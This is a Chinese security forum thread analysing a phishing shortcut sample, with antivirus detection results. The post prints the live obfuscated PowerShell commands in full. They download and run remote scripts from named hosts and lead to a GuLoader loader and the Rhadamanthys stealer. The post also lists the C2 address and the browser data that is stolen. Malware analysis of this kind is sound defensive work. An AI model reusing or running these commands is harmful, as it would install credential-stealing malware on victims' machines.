样本1X

Komeiji-Reimu

sanhu35 发表于 2024-7-5 23:26
直接识别钓鱼快捷方式内目标或命令行

冰盾默认kill

QVM360

运行lnk，会执行powershell，命令行为：

1. "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${g72p14} = $PSHOME;${*tc18kw.} = ${g72p14}[+52 -53 +1] + ${g72p14}[-11 +2] + 'A' + ${g72p14}[-66 +55];${xih.} = $([TYPE]${*tc18kw.});${*.p9nc2a.} = ${xih.}::ToString(+79 -1 -5)+${xih.}::ToString(+79 -1 -5 -4)+${xih.}::ToString(+79 +30 -10 +21);&(${*.p9nc2a.})(&(${*.p9nc2a.})(${g72p14}[+52 -53 +1]+'u'+${g72p14}[-66 +55]+${g72p14}[-61 +55]+' https://www.delpas.it/mo/qc.txt -UseBasicParsing'))

复制代码

注意到这个

1. https://www.delpas.it/mo/qc.txt

复制代码

内容是

1. powershell -win hidden $g72p14=iex($('[Environment]::GetExihs'''.Replace('xih','nvironmentVariable(''public'') + ''\\p9nc2a.vb')));$flol=iex($('[Environment]::GetExihs'''.Replace('xih','nvironmentVariable(''public'') + ''\\yd2.vb')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Nh5fw-Objh5fct Systh5fm.Nh5ft.Wh5fbClih5fnt).Downh9he($oulv.Replace(''j5f'',''tps://'').Replace(''r4j'', ''e''), $fz)').Replace('h5f', 'e').Replace('h9h', 'loadFil'));iex('szvbarzvb $fz'.Replace('zvb','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htj5fwww.kuthbanr4jng.com/wh/List%20of%20rr4jquirr4jd%20itr4jms%20and%20sr4jrvicr4js.pdf';getit -fz $flol -oulv 'htj5fwww.pinr4japplr4jtr4jch.ar4j/at/at.vbs';exit

复制代码

包含高度混淆的内容，具体行为是下载一个vbs文件（见附件）
vbs文件会调用powershell，命令行如下

1. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens';If (${host}.CurrentCulture) {$Spicehouse249++;}Function Volplanes($Milliardren){$rebait=$Milliardren.Length-$Spicehouse249;$Ggepulveres214='SUBsTR';$Ggepulveres214+='ing';For( $Regnerable=5;$Regnerable -lt $rebait;$Regnerable+=6){$taplb+=$Milliardren.$Ggepulveres214.Invoke( $Regnerable, $Spicehouse249);}$taplb;}function Tilhre($Miltsick){ & ($Parakelia) ($Miltsick);}$tailforemost=Volplanes 'AnnotMAtiono bilcz Skr iMonstl TekslSnyd,am.com/Mat r5Acerb.Pyrro0 Lsen Aflv,(Knas,W BlreiBlavenF.inlda gadoPersowDrives brov LeonNRoupiTGoust Hjhed1Situe0E erf. Shri0Smagl; E.ga ,avneW Chy,iCircunBeded6,appe4Bende;Misch SussexRevan6Bjrn.4 Trio;Anven T.dssr rivivPu ga:Chuga1Ma.gi2smit.1 Cons. Comp0C,eni),onpo Ade,iGIbidieE,lasc Recek P atoSu te/Poste2 Ting0salpi1Pendr0Thyge0Ritra1Bl,ge0Overn1 ,ovs TetraFKomm.iIndicrPaleneGe,kefsinguoTe.nix Kvit/Fa,ee1Drupa2 Krig1Nonex.,agbl0Nonun ';$Transformability=Volplanes 'HindbUGre.dsSvedjeQu.ysrFodno-NonreAVelm gSo.lmeTjen,nFescetAc iv ';$progressions=Volplanes ' ProchU.klitWagont rivepFrerbs L,xi:Moonc/Forbr/UvrdiwUnisswUds.rwHerna.Analya M.nnlbilbrmB strrAnbefwRive.aP rdodbrabr.Brugsc.overononfomSuper/Nona mH.shenTilde/ajospU IntedUnfr,lSkoleiSkaangtrevrgsoloueRea,prMethasSejrs.SolbehStyrehEtablkActin>non,ehDimentTilsetDim tp PrepsGenop:Alryd/Manco/TolvmwKvikrwtaljew Sten.Nekroe antarCh nqpFlagm-Nonasr OndyoSttteyVandgaDefaclMikro-SwallcVenezra.cliofilfow Lam nGigge.overgiPinlinIvrksfHexaso C ri/ Gastm vrisn Eska/Ph,llUPendudDeciblEuropiBarnegFejlsgovermeAnch,rS,ccesOverf.Unr,fh GuilhPhospkPrint ';$Falsificere=Volplanes 'inter> Disq ';$Parakelia=Volplanes '.yophiModsteFornrx Wo,l ';$Simar='Copyrights';$Supperne = Volplanes 'Gru deHandlcG.strhPartioPara Jespe%LongiaLe chpJaspepout.td Overarem ntfrygtaInt r%Skspo\LoharVUnforiSvupss rinaiSecu tSpliceViroirFe lteF,ondsFunkt.ProgrHExcruuEmpovdm.cra unbew&Decli&Ba ks Knusee grshcSl,brh LuftoNonsh BombytRei,v ';Tilhre (Volplanes 'ca pa$NonnegKva,il Cawio GynkbEv,luaUnderlCepha: HackBTegngrForesn Haple einefCarchdSinopsKontoeApprola.erdsSapo.dKultuaLiniegTomme=Hoved(VippecRefrem S yldGensk hygri/BrankcGener Uncro$DumblSOut auDyslep licep UnavePic.irMarlinRapsoeM.use)Medal ');Tilhre (Volplanes 'nimbl$C evogDansklHu froParambCarolaRumakl,peci: PaniGOp avlSpejlu TotatDreadiafhaet El,ciUnsoloTitann.reti2S,lke4 Ambi0 W.st=Beauj$ .hiapFis.ir popuoAkkilg Nonsr [过滤]e OversRiskfsJonahi KlunoS,uirnNonarsde ik..vergsJudicp AfrelPhylliherm t Tran(Nummi$,nhinFArbejaUnhu lLandrsMikroi F ruf.uisai BgescValkyeFarror Svige .ack) Yd,r ');Tilhre (Volplanes ' B,rh[SloppNTaksieNona.t Prag.TufthSPerseeG,anerRear,vRooibi,erricApocaem croPUdtolo PrejiArbejnMagnetOvervME.erga ,ilonc.yptaArbejgAllsweUdskirBatik] Last:Peger:GolbeSOverpe misacTransuUnpourpapyri BadetForuryDamewPSkldurligeso StratkageroBractcItenso FurelVolde ,rag=.ilms Livsf[DepraNBeda eBisubtUngdo. SpecSUndere OikocReveruCragsrKermeiI,dvitVulneyDygtiPCy,lorT,biro.ejrftKondioStillcB.ibeointralF,yenTLakkey ekrnpBedrieJe ni]Combi:D.nax: Eft,Tc gnalSafets Knud1Paste2Undul ');$progressions=$Glutition240[0];$Deliciousness= (Volplanes 'Mor.i$SkrifgSca.elFril,o Ufo,bMa era HypolA.ari: LedeL,phodnMoskgnNed liSplinnRavivgStoles Repadpekina BomrgT.anaeTr.sssUnspi=ap,esNSorg,e P,sew Chro-Imbo OdobbebParo jTvisteorgancPhaent Poit Udtr S.ackpy Henrs smaatF rreeRhizomForst.UdvikNTvrdrePe,chtHygro.Ka.beWTak feva sobOmstbClsseklKvadri Serre StilnDelirt');$Deliciousness+=$Brnefdselsdag[1];Tilhre ($Deliciousness);Tilhre (Volplanes ' Mund$ConceLKadminPie.enStudeiSelvbnGallogSemimsOverrd Prova.utopg Fejle AvansOrtho.P.ogrHKaerle Bnknaef,rgdSyllaeForr.r.renesHatch[Rumor$HieroTAd,norTioloaTandbnUndersEtablfSkaleoDeklarAfs,emThe yaT,hanbvinkliHa malRashei,ndvetgy.nay Bila]Taetd=Ombes$cho otTegnfaIdiosi,aabel vaunfU deroHjer,rpsitteDrawlm PrinoCent.sHandetsp.in ');$Benzinautomaten=Volplanes 'Kvote$,nfraLF,netnK.rsunDisiniCheninSafragNursisSkuffdChequaskygngKanoneTa nesSvvef.CamouDU baso PyntwLegalnSi ralPen.eopresuasondedKonfeF Ca,iiFor alSe,mie Silk(Par,l$Frstep UslurPenstohusmagPartirBetaleMollysTrembsSpritifeltmo .alkn CounsHarce,stile$u,uguTLokaleAdhregFo prnSublueMit.rbTombagNe,gae Gradr Tids)domne ';$Tegnebger=$Brnefdselsdag[0];Tilhre (Volplanes 'Co,li$Revolg KinglDirekoV,deobWindbaPrydelAirsc: Us aG.eoloi fgifvFortraNajadb .ryslAntise,umbl= Over(MastiTGranueChrissBurgot Fers-FantaP MuncaFilkotUngaihChurn ersk$UnderTBrn.peRter gMist.n KerneMethab Indfg StopeRrdamrnosog)Kog.i ');while (!$Givable) {Tilhre (Volplanes 'Point$Sociog GarvlMucouoc stob fremaSolinlVisse: IsceMRegi eBeb,dkSuperaDe,ignBr,kni Datas OrigeUninfrDesexeFjereno.isod ,visesta,ksSpice= Axop$S,abrtIrrearRolpeuConjueJeron ') ;Tilhre $Benzinautomaten;Tilhre (Volplanes 'indskSPrsentMaskia oaxerByldetVi eo-VenteSTonenlRec,ge,nstneS,rvipecard Dropw4Morg, ');Tilhre (Volplanes 'Tilke$AngiagCellolSnoedo Tastb ScraaPlintlAntib:WaterGassyriMongovGall,aPreapbSkemal ucieCorme=Ju,ic(EpithTOr,aneScr,bsAu ibtFrs.o- akuuPNecroaDragntM,delhUdfor Une a$.orbeTKlar.e elefg.negrnThunde Je.nb DeligWe sheIntrorFlank) To a ') ;Tilhre (Volplanes ' I du$ArbejgPseudlFolkeoForfrb SatsaLserflSuper:PhysiBWashsrKlatmuTomaemNrhedaf.ihel,lanoiSels.aChant=Unde $BesttgOerstlUncono tippbBetdsaF.cetlIsblo:saha SKommaaStuddmsyn,elDisc,iMyalln unexgPassisStrugrMejsleEgaligThe peIffymr,lostifishsnBlencgHaanee grnsn Mats+An.if+Sple.%Fejes$kongeGWestelBesseuEnthutSjofei Slv.tUnshaiPlagioVoldgnBa,eo2Bankk4 udby0Bouch.subclcParieoYor euSpindnDepontFresk ') ;$progressions=$Glutition240[$Brumalia];}$Existimation=345476;$Basigenous=28090;Tilhre (Volplanes 'Rhodi$Tima gTastal U,mioOverwblukkeaSportlKorre:ByretH C iroCottomM,byeos.otjn SagsyFortum.nproeTryllt lekssAffal odon=Blaam RegntG T,rkeTerzitdrago-CiselC polioc emonHadjitIn ideClu.pntri,utUlydi Bev $ScogiTElimieEst ogBemocnTowbaeReleabSupergNui.oeRadiar Barr ');Tilhre (Volplanes 'Hurs,$Mis.egHeppll ,erroPeritbFllesad.gtil Traf:BadevA uldmnMicrosOpt,eeBrev.eForhnnSmiledInflueOrphesRelea Ignor=Off.e Malle[ Ce.tSLujulyMotilsFarfdtKendeeAtweemcytas.ComprCSquamoLocksnFinanv QueneTakvirMace t ,att]Cripe:Inset: ,etsFr.styrAcepho RegrmOffenB Addua F,ass .vlveDeadf6Tre.o4 Sa tSStigntAfmnsrDobbei P,lonafstag Over(Z,nur$EndoaHEksemoIn ermForedoRootsnIntroyStamfmLut.aeTyll.tStablsStat,)proto ');Tilhre (Volplanes 'snr,l$.yplagUnprel .aveoBogklb,rerfaPrecol onoc:typesCUniceeimperm BorteTota t OutleTendorAerohiPrecaaBonnilBevog Disc=Unsin Pomf [ProgrSSynkryDeafns .icrtNytteePerdem arty.Welc,TGrasseSmig,xEfte t M.df. s,afEVarsknTeorecDk,etoAmbigdDecimiNeutrn SiligU,ens].arts:frate: blitARispaSarbitCChazyIFrydeIKu.ti.Bonn.G Aft,eBa,ehtMudreSSva,etLagerr DissiVarefnToparg,fsko(Rnebl$RaabeASkol.nSalvas P rteAfsaleOptegnSkramdSighteDeputs Flso)Hklet ');Tilhre (Volplanes 'Reli.$ Gorgg El.clEonscoTrabebFlu da Utakl Haar:cape,P,eminu.irekrT.nnipAtmialCompeeBero.wMo,ryoromauo amtsdTum l=Blush$NeuraC WeddeVe tkm Ruteel,etmtOms re,upinrBruttisklsaaApp,ylStr p.v talsduponuunspebHa.kesIntittPrestrKrigsi Spadn Fr mgFra.t(Guldd$Gyn,nE,nvibxaphesiFr.nksLituitBuazeiTimbemDommeaOl.sttKandiiElectoMollinMoxie, Gear$FundeBOpstvaKenotsSejrsiSkarng probe Clocni nicoSte kusulfisTinge)Sko s ');Tilhre $Purplewood;"

复制代码

在其中发现了#Guloader的特征代码，因为powershell创建了 （见附件）

1. %appdata%\Visiteres.Hud

复制代码

Visiteres.Hud是一个使用base64编码的文件，可能被用于进行线程注入后台检测到程序注入了

1. C:\WINDOWS\system32\OOBE-Maintenance.exe
   

复制代码

1. C:\WINDOWS\system32\openwith.exe

复制代码

1. C:\Program Files\Windows Media Player\wmplayer.exe

复制代码

连接到C2服务器：

1. 91.92.242.245:443

复制代码

这是#Rhadamanthys的C2服务器
程序读取浏览器的用户数据

1. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8

复制代码

并上传至C2服务器中

完整运行过程
Analysis qc.txt (MD5: FB6402D3EF1FCDD5AF327668FA8D41B4) Malicious activity - Interactive analysis ANY.RUN
Analysis yd2.vbs (MD5: D19A4C4B7BE7F5AD5187433ECE99115C) Malicious activity - Interactive analysis ANY.RUN

yaokai815

火绒kill  瑞星miss